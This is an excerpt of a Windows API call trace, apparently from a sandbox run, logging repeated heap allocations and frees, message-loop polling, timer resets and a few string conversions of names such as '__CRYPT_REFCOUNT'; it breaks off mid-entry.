[0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0176.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0176.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0176.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0176.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0176.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0176.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0176.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0176.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0176.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0176.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0176.945] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0176.945] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0176.945] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0176.945] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0176.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0176.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0176.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0176.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0176.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0176.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0176.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0176.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x422b020 [0177.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0177.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0177.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0177.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0177.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0177.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0177.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4330020 [0177.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x422b020 | out: hHeap=0x970000) returned 1 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0177.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0177.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0177.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0177.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0177.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0177.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0177.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0177.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0177.309] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0177.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0177.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0177.309] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0177.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0177.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0177.310] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0177.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0177.310] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0177.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0177.311] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0177.311] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0177.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0177.311] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0177.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0177.312] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0177.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0177.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0177.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0177.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0177.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0177.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4220020 [0177.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0177.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0177.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x444d020 [0177.585] HeapFree (in: 